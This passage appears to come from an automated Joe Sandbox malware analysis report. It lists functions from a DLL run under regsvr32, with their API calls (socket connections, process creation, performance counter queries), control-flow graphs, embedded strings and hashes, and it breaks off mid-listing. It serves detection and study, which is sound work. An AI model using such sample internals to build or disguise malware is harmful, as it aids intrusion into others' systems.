                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CryptFunction036RandomSystem
                                                                  • String ID:
                                                                  • API String ID: 1232939966-0
                                                                  • Opcode ID: a72cf556a5df5e0ec72b18827bdd167bdaaab077361702e8cf1df98d307ec36f
                                                                  • Instruction ID: 8540e9f4d83e5db932b49887c37cc21bcf2c7de18a38aae1be3eebfdab0e943e
                                                                  • Opcode Fuzzy Hash: a72cf556a5df5e0ec72b18827bdd167bdaaab077361702e8cf1df98d307ec36f
                                                                  • Instruction Fuzzy Hash: 46E048736022297AEB2015E69DC1FD6BB8DDBA6AE8F114622FE1897590C671CC5601E0
                                                                  Function 6C8E5B50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 311COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1434 6c8e5b50-6c8e5b7c call 6c8f3c80 1437 6c8e5b7e-6c8e5b85 1434->1437 1438 6c8e5b8a-6c8e5bb6 1434->1438 1439 6c8e5d43-6c8e5d57 1437->1439 1440 6c8e5bbe-6c8e5c04 1438->1440 1441 6c8e5bb8-6c8e5bb9 CloseHandle 1438->1441 1442 6c8e5d85-6c8e5d8e 1439->1442 1443 6c8e5c4f-6c8e5c51 1440->1443 1444 6c8e5c06-6c8e5c08 1440->1444 1441->1440 1445 6c8e5c9b-6c8e5ca8 WaitForSingleObject 1443->1445 1446 6c8e5c53-6c8e5c6b call 6c8f00c0 1443->1446 1447 6c8e5c0a-6c8e5c15 call 6c8f2f20 1444->1447 1448 6c8e5c74-6c8e5c8f call 6c8f00c0 1444->1448 1451 6c8e5caa-6c8e5cb6 GetLastError 1445->1451 1452 6c8e5ce9-6c8e5cfc GetExitCodeProcess 1445->1452 1463 6c8e5d94-6c8e5dbb call 6c92c280 1446->1463 1464 6c8e5c71-6c8e5c72 1446->1464 1460 6c8e5c1a-6c8e5c21 1447->1460 1466 6c8e5dbd-6c8e5de1 call 6c92c280 1448->1466 1467 6c8e5c95 1448->1467 1458 6c8e5cb8-6c8e5cbb 1451->1458 1459 6c8e5cc6-6c8e5ccb 1451->1459 1455 6c8e5d8f 1452->1455 1456 6c8e5d02-6c8e5d22 1452->1456 1455->1451 1465 6c8e5d27-6c8e5d3b CloseHandle * 2 1456->1465 1468 6c8e5cbe-6c8e5cc3 call 6c85ac40 1458->1468 1461 6c8e5ccd-6c8e5cd8 call 6c85ac40 1459->1461 1462 6c8e5cdb-6c8e5ce7 1459->1462 1460->1445 1469 6c8e5c23-6c8e5c4a call 6c92c280 1460->1469 1461->1462 1462->1465 1482 6c8e5de4-6c8e5e39 call 6c8b0760 CloseHandle 1463->1482 1472 6c8e5c96 CloseHandle 1464->1472 1473 6c8e5d3d-6c8e5d40 1465->1473 1474 6c8e5d59-6c8e5d82 1465->1474 1466->1482 1467->1472 1468->1459 1469->1482 1472->1445 1473->1439 1474->1442 1487 6c8e5e3b-6c8e5e46 call 6c85ac40 1482->1487 1488 6c8e5e49-6c8e5e4e 1482->1488 1487->1488 1490 6c8e5e5e-6c8e5ea6 call 6c8b0e80 CloseHandle * 2 call 6c9459b0 call 6c8f3c80 1488->1490 1491 6c8e5e50-6c8e5e5b call 6c85ac40 1488->1491 1501 6c8e5ea8-6c8e5eb1 1490->1501 1502 6c8e5eb6-6c8e5ed9 1490->1502 1491->1490 1503 6c8e5f44-6c8e5f4d 1501->1503 1504 6c8e5edb-6c8e5ede CloseHandle 1502->1504 1505 6c8e5ee3-6c8e5eed WaitForSingleObject 1502->1505 1504->1505 1506 6c8e5eff-6c8e5f0f GetExitCodeProcess 1505->1506 1507 6c8e5eef-6c8e5efd GetLastError 1505->1507 1506->1507 1509 6c8e5f11-6c8e5f17 1506->1509 1508 6c8e5f1a-6c8e5f2c CloseHandle * 2 1507->1508 1510 6c8e5f2e-6c8e5f31 CloseHandle 1508->1510 1511 6c8e5f36-6c8e5f3a 1508->1511 1509->1508 1510->1511 1511->1503 1512 6c8e5f3c-6c8e5f3f CloseHandle 1511->1512 1512->1503
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle
                                                                  • String ID: called `Result::unwrap()` on an `Err` value
                                                                  • API String ID: 2962429428-2333694755
                                                                  • Opcode ID: e19651428e5a36827944cc94e7746eeceeeceaa788947510b8d94c2075065365
                                                                  • Instruction ID: 609327311cc722e85ecf3706d192126fbfbd4cd0d185b8e4ab5d5c29c226b191
                                                                  • Opcode Fuzzy Hash: e19651428e5a36827944cc94e7746eeceeeceaa788947510b8d94c2075065365
                                                                  • Instruction Fuzzy Hash: E9C17A70D01319ABDF20DFA4CD44ADEBBB5BF5A308F104629E815BB740E7349985CBA0
                                                                  Function 02632D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ResetEvent.KERNEL32(?), ref: 02632D9B
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 02632DA7
                                                                  • timeGetTime.WINMM ref: 02632DAD
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 02632DDA
                                                                  • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02632E06
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02632E12
                                                                  • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02632E31
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02632E3D
                                                                  • gethostbyname.WS2_32(00000000), ref: 02632E4B
                                                                  • htons.WS2_32(?), ref: 02632E6D
                                                                  • connect.WS2_32(?,?,00000010), ref: 02632E8B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                  • String ID: 0u
                                                                  • API String ID: 640718063-3203441087
                                                                  • Opcode ID: b85f29f57907a233d42da02ccfcdcc3505e6aced871a4dbc228533796a211d1e
                                                                  • Instruction ID: 673d44ddc6b4b33d098faafccd4fae5d62759e290bc88125e692fe83c61f9100
                                                                  • Opcode Fuzzy Hash: b85f29f57907a233d42da02ccfcdcc3505e6aced871a4dbc228533796a211d1e
                                                                  • Instruction Fuzzy Hash: 49613075A80308ABE720DFA4DC45FAEB7F9FF58B10F504519FA46A72C0D7B0A9448B64
                                                                  Function 6C87A960 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 427COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1665 6c87a960-6c87a97e 1666 6c87aab6-6c87aad2 PdhOpenQueryA 1665->1666 1667 6c87a984-6c87a994 PdhCollectQueryData 1665->1667 1668 6c87aad4-6c87aae3 1666->1668 1669 6c87aaea-6c87aafe call 6c8898f0 call 6c85b180 1666->1669 1670 6c87a996-6c87a9b0 call 6c85b920 1667->1670 1671 6c87a9c9-6c87a9d8 call 6c85bc60 1667->1671 1672 6c87aae5 1668->1672 1673 6c87ab30-6c87ab41 call 6c85b7a0 1668->1673 1700 6c87ae26-6c87ae3c call 6c92c280 1669->1700 1701 6c87ab04-6c87ab2a 1669->1701 1683 6c87a9b6-6c87a9c4 1670->1683 1684 6c87ae15-6c87ae21 call 6c92bc50 1670->1684 1688 6c87aa2e-6c87aa35 1671->1688 1689 6c87a9da-6c87a9e5 1671->1689 1677 6c87ac0a-6c87ac41 1672->1677 1673->1677 1694 6c87ab47-6c87ab58 1673->1694 1686 6c87ac43-6c87ac4a 1677->1686 1687 6c87ac4b-6c87ac62 call 6c85ac30 1677->1687 1683->1671 1684->1700 1705 6c87ae41-6c87ae45 call 6c920620 1687->1705 1706 6c87ac68-6c87acc5 call 6c85ac30 1687->1706 1688->1686 1691 6c87aa3b-6c87aa3f 1688->1691 1695 6c87a9f8-6c87a9fa 1689->1695 1691->1686 1699 6c87aa45-6c87aa5d call 6c85c720 1691->1699 1702 6c87abd5-6c87abee 1694->1702 1703 6c87ab5a-6c87ab6d 1694->1703 1697 6c87a9f0-6c87a9f6 1695->1697 1698 6c87a9fc-6c87aa13 call 6c85b920 1695->1698 1697->1688 1697->1695 1720 6c87ae04-6c87ae10 call 6c92bc50 1698->1720 1721 6c87aa19-6c87aa2c 1698->1721 1724 6c87aa97-6c87aa99 1699->1724 1725 6c87aa5f-6c87aa7b 1699->1725 1700->1705 1701->1673 1701->1677 1702->1677 1710 6c87abf0-6c87ac07 call 6c85ac40 1702->1710 1704 6c87ab7c-6c87ab7f 1703->1704 1711 6c87ab81-6c87ab8e 1704->1711 1712 6c87abab-6c87abbb 1704->1712 1726 6c87ae4a-6c87aec3 call 6c920620 call 6c85ac40 call 6c9459b0 call 6c871120 call 6c9459b0 call 6c92c040 1705->1726 1706->1726 1729 6c87accb-6c87ad08 call 6c87cb00 call 6c85bc60 1706->1729 1710->1677 1718 6c87ab90-6c87aba7 1711->1718 1722 6c87ab70-6c87ab7a 1712->1722 1723 6c87abbd-6c87abd3 call 6c85ac40 1712->1723 1718->1718 1728 6c87aba9 1718->1728 1720->1684 1721->1697 1722->1702 1722->1704 1723->1722 1734 6c87aa9b-6c87aaa7 call 6c85ac40 1724->1734 1735 6c87aaaa-6c87aab1 1724->1735 1732 6c87aa80-6c87aa82 1725->1732 1765 6c87aec5-6c87aec6 call 6c9459b0 1726->1765 1766 6c87aecb-6c87aef0 call 6c85ac40 call 6c9459b0 1726->1766 1728->1712 1747 6c87ad0d-6c87ad12 1729->1747 1732->1724 1738 6c87aa84-6c87aa95 1732->1738 1734->1735 1735->1686 1738->1724 1738->1732 1749 6c87adeb-6c87adf9 1747->1749 1750 6c87ad18-6c87ad2d 1747->1750 1749->1667 1752 6c87adff 1749->1752 1753 6c87ad30-6c87ade5 call 6c921760 * 2 call 6c87cb00 1750->1753 1752->1686 1753->1749 1765->1766 1772 6c87af02-6c87af13 call 6c87e170 1766->1772 1773 6c87aef2 1766->1773 1779 6c87af26-6c87af5f call 6c87a960 1772->1779 1780 6c87af15-6c87af23 call 6c85ac40 1772->1780 1773->1772 1774 6c87aef4-6c87aeff call 6c85ac40 1773->1774 1774->1772 1780->1779
                                                                  APIs
                                                                  • PdhCollectQueryData.PDH(?), ref: 6C87A98A
                                                                    • Part of subcall function 6C85B920: memcmp.MSVCRT(?,00000030,5F28726F), ref: 6C85B9F0
                                                                    • Part of subcall function 6C85B920: PdhGetFormattedCounterValue.PDH(00000030,00000200,00000000,?), ref: 6C85BA55
                                                                  • PdhOpenQueryA.PDH(00000000,00000000,00000000), ref: 6C87AAC7
                                                                  Strings
                                                                  • cess, xrefs: 6C87AC9D
                                                                  • global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\system.rs, xrefs: 6C87AE1C
                                                                  • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6C87AE37
                                                                  • l)\%, xrefs: 6C87AC88
                                                                  • e Ti, xrefs: 6C87AC7A
                                                                  • Tota, xrefs: 6C87AC8F
                                                                  • or(_, xrefs: 6C87AC96
                                                                  • Idl, xrefs: 6C87AC81
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Query$CollectCounterDataFormattedOpenValuememcmp
                                                                  • String ID: Idl$Tota$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$cess$e Ti$global_key_idle disappearedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-1cd66030c949c28d\sysinfo-0.32.0\src\windows\system.rs$l)\%$or(_
                                                                  • API String ID: 3579676406-1093267101
                                                                  • Opcode ID: c40792008926a886f1f3f44d182e0a3fa26a1716ee18c2ebdc00df2a96f66c86
                                                                  • Instruction ID: 538d5d75a9f996407671e02ca933dc7f4e98c2b5e8f591e2a8731749345aa4a8
                                                                  • Opcode Fuzzy Hash: c40792008926a886f1f3f44d182e0a3fa26a1716ee18c2ebdc00df2a96f66c86
                                                                  • Instruction Fuzzy Hash: 2C02F471905305AFD720CF14C980BABBBE0BF95708F148A2DF89857791E771E958CBA2
                                                                  Function 6C948390 Relevance: 15.1, APIs: 10, Instructions: 97COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value
                                                                  • String ID:
                                                                  • API String ID: 3702945584-0
                                                                  • Opcode ID: f26be120ee58e6dbfe7adb4fd79cca90671ce8336a37477147a5edaeff0c80bc
                                                                  • Instruction ID: 0018c5b46947ea84774c7ea058d9ee126c30fc6f7f08d4e99c0c36bc33b9a03c
                                                                  • Opcode Fuzzy Hash: f26be120ee58e6dbfe7adb4fd79cca90671ce8336a37477147a5edaeff0c80bc
                                                                  • Instruction Fuzzy Hash: 8D3137B1A093009FEB00AF69D58831ABFF8EB55314F10856AE894C7346E775C558CF92
                                                                  Function 6C8F2F20 Relevance: 10.7, APIs: 7, Instructions: 180COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2128 6c8f2f20-6c8f2f48 call 6c8f3180 2131 6c8f2f5a-6c8f2f8f call 6c8f3180 2128->2131 2132 6c8f2f4a-6c8f2f55 CloseHandle 2128->2132 2136 6c8f2f9b-6c8f2fc8 2131->2136 2137 6c8f2f91-6c8f2f96 2131->2137 2133 6c8f3139-6c8f3140 2132->2133 2139 6c8f2fd0-6c8f2fe2 WaitForMultipleObjects 2136->2139 2138 6c8f3131-6c8f3134 call 6c8b0de0 2137->2138 2138->2133 2140 6c8f2fe4-6c8f2fe6 2139->2140 2141 6c8f3020-6c8f3025 2139->2141 2143 6c8f2fec-6c8f2ff1 2140->2143 2144 6c8f311b-6c8f3123 GetLastError 2140->2144 2145 6c8f302b-6c8f302e 2141->2145 2146 6c8f30d3-6c8f30d8 call 6c8f3220 2141->2146 2147 6c8f2ff3-6c8f2ff6 2143->2147 2148 6c8f3072-6c8f3076 call 6c8f3220 2143->2148 2149 6c8f3126 2144->2149 2150 6c8f3038-6c8f3051 GetOverlappedResult 2145->2150 2151 6c8f3030-6c8f3033 2145->2151 2159 6c8f30dd-6c8f30e8 2146->2159 2153 6c8f3058 2147->2153 2154 6c8f2ff8-6c8f3011 GetOverlappedResult 2147->2154 2169 6c8f307b-6c8f3086 2148->2169 2155 6c8f3129-6c8f312c call 6c8b0de0 2149->2155 2157 6c8f30a8-6c8f30b2 GetLastError 2150->2157 2158 6c8f3053-6c8f3056 2150->2158 2156 6c8f30c0-6c8f30d1 2151->2156 2166 6c8f305b-6c8f306c 2153->2166 2161 6c8f3013-6c8f3016 2154->2161 2162 6c8f3092-6c8f309c GetLastError 2154->2162 2155->2138 2156->2146 2165 6c8f310f-6c8f3119 call 6c8f3310 2156->2165 2157->2156 2164 6c8f30b4-6c8f30b7 2157->2164 2158->2156 2167 6c8f30ea-6c8f30ec 2159->2167 2168 6c8f30f4-6c8f310a 2159->2168 2161->2166 2162->2166 2171 6c8f309e-6c8f30a1 2162->2171 2172 6c8f30bd 2164->2172 2173 6c8f3141-6c8f314a 2164->2173 2165->2155 2166->2148 2174 6c8f310c 2166->2174 2167->2139 2175 6c8f30f2 2167->2175 2168->2155 2169->2168 2176 6c8f3088-6c8f308a 2169->2176 2171->2166 2179 6c8f30a3 2171->2179 2172->2156 2173->2149 2174->2165 2175->2165 2176->2139 2177 6c8f3090 2176->2177 2177->2174 2179->2173
                                                                  APIs
                                                                    • Part of subcall function 6C8F3180: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F3192
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8F2F50
                                                                    • Part of subcall function 6C8B0DE0: CloseHandle.KERNEL32(?,000000FF), ref: 6C8B0DF3
                                                                    • Part of subcall function 6C8B0DE0: CloseHandle.KERNEL32(?,?,000000FF), ref: 6C8B0DFB
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreateEvent
                                                                  • String ID:
                                                                  • API String ID: 1371578007-0
                                                                  • Opcode ID: b691043e6636398c8592cb971b62441a41bdf871ac5afe1d16dd0f59f36987b2
                                                                  • Instruction ID: 9c93f44e1e1ac6c4aa023592a6554434b2570ba0dc1f82e9a669eb13f4823410
                                                                  • Opcode Fuzzy Hash: b691043e6636398c8592cb971b62441a41bdf871ac5afe1d16dd0f59f36987b2
                                                                  • Instruction Fuzzy Hash: 52615FB0E04658DBDB20CFA9C9806DEBBB5BF49354F14492AE825B7740DB309C46CB22
                                                                  Function 026373DB Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 2180 26373db-26373e9 2181 26373eb-26373fd call 26372cd call 26387f3 2180->2181 2182 26373ff-2637417 call 2639878 call 263a0e4 2180->2182 2191 2637477-263747a 2181->2191 2192 2637462-263746b call 2637009 2182->2192 2193 2637419-263743b call 2639a33 call 2639906 2182->2193 2198 2637474 2192->2198 2199 263746d-2637473 call 26372f3 2192->2199 2205 2637440-2637458 CreateThread 2193->2205 2206 263743d 2193->2206 2202 2637476 2198->2202 2199->2198 2202->2191 2205->2202 2207 263745a-2637460 GetLastError 2205->2207 2206->2205 2207->2192
                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 02637400
                                                                  • __calloc_crt.LIBCMT ref: 0263740C
                                                                  • __getptd.LIBCMT ref: 02637419
                                                                  • CreateThread.KERNEL32(?,?,02637376,00000000,?,?), ref: 02637450
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0263745A
                                                                  • _free.LIBCMT ref: 02637463
                                                                  • __dosmaperr.LIBCMT ref: 0263746E
                                                                    • Part of subcall function 026372CD: __getptd_noexit.LIBCMT ref: 026372CD
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 155776804-0
                                                                  • Opcode ID: 0816edfaef114579a8d274e086a4b358523922ee63e3b854c520e58ef16615d3
                                                                  • Instruction ID: cd547a6a01a16bcd3a0f1fef80dd357da591227a7e954de1422035d9bfadfaed
                                                                  • Opcode Fuzzy Hash: 0816edfaef114579a8d274e086a4b358523922ee63e3b854c520e58ef16615d3
                                                                  • Instruction Fuzzy Hash: 3C114872540386AFE713AFB4DC40E9FBBDAEF05374B00442DF96486241DB71E4008EA4
                                                                  Function 02637376 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0263737C
                                                                    • Part of subcall function 02639878: TlsGetValue.KERNEL32(?,02637381), ref: 02639881
                                                                    • Part of subcall function 02639878: RtlDecodePointer.NTDLL ref: 02639893
                                                                    • Part of subcall function 02639878: TlsSetValue.KERNEL32(00000000,?,02637381), ref: 026398A2
                                                                  • ___fls_getvalue@4.LIBCMT ref: 02637387
                                                                    • Part of subcall function 02639858: TlsGetValue.KERNEL32(?,?,0263738C,00000000), ref: 02639866
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0263739A
                                                                    • Part of subcall function 026398AC: RtlDecodePointer.NTDLL(?), ref: 026398BD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 026373A3
                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 026373AA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 026373B0
                                                                  • __freefls@4.LIBCMT ref: 026373D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                  • String ID:
                                                                  • API String ID: 2876972746-0
                                                                  • Opcode ID: fec77024fecd0786212b5332df6c86302f8fadd4361f6e31e833a559b1c06ee3
                                                                  • Instruction ID: f8ec2dbbc8de401f76843818fd3c2daf99b914e13d071a2f74d0ddf5757602f7
                                                                  • Opcode Fuzzy Hash: fec77024fecd0786212b5332df6c86302f8fadd4361f6e31e833a559b1c06ee3
                                                                  • Instruction Fuzzy Hash: 94F03AB8541644ABD70ABF71C94894EBBEAEF88340350C85CE8468B311DB74E8428FA9
                                                                  Function 0263736A Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 026383D2: _doexit.LIBCMT ref: 026383DE
                                                                  • ___set_flsgetvalue.LIBCMT ref: 0263737C
                                                                    • Part of subcall function 02639878: TlsGetValue.KERNEL32(?,02637381), ref: 02639881
                                                                    • Part of subcall function 02639878: RtlDecodePointer.NTDLL ref: 02639893
                                                                    • Part of subcall function 02639878: TlsSetValue.KERNEL32(00000000,?,02637381), ref: 026398A2
                                                                  • ___fls_getvalue@4.LIBCMT ref: 02637387
                                                                    • Part of subcall function 02639858: TlsGetValue.KERNEL32(?,?,0263738C,00000000), ref: 02639866
                                                                  • ___fls_setvalue@8.LIBCMT ref: 0263739A
                                                                    • Part of subcall function 026398AC: RtlDecodePointer.NTDLL(?), ref: 026398BD
                                                                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 026373A3
                                                                  • RtlExitUserThread.NTDLL(00000000), ref: 026373AA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 026373B0
                                                                  • __freefls@4.LIBCMT ref: 026373D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                  • String ID:
                                                                  • API String ID: 811752470-0
                                                                  • Opcode ID: 52f955a77cda6ee3d85607626bb12db13f9d038e95c19b838b26b6b59c27f4c0
                                                                  • Instruction ID: 94ecb72782484b4e6e624e5d1b8f95e4348a59825d7f7a34d4827ef85bbd0b6a
                                                                  • Opcode Fuzzy Hash: 52f955a77cda6ee3d85607626bb12db13f9d038e95c19b838b26b6b59c27f4c0
                                                                  • Instruction Fuzzy Hash: FBE01B75941649A7DB133BF18C0859F7A9EDD55340B504C18ED5293100DF74E8514FF9
                                                                  Function 6C8F3180 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F3192
                                                                  • GetLastError.KERNEL32(00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F31DB
                                                                  • CloseHandle.KERNEL32(?,00000000,00000001,00000001,00000000,?,?,00000000,?,6C8F2F39,?), ref: 6C8F31EE
                                                                  • CloseHandle.KERNEL32(00000000,?,?,6C8F2F39,?), ref: 6C8F3209
                                                                  • CloseHandle.KERNEL32(?,00000000,?,?,6C8F2F39,?), ref: 6C8F320F
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
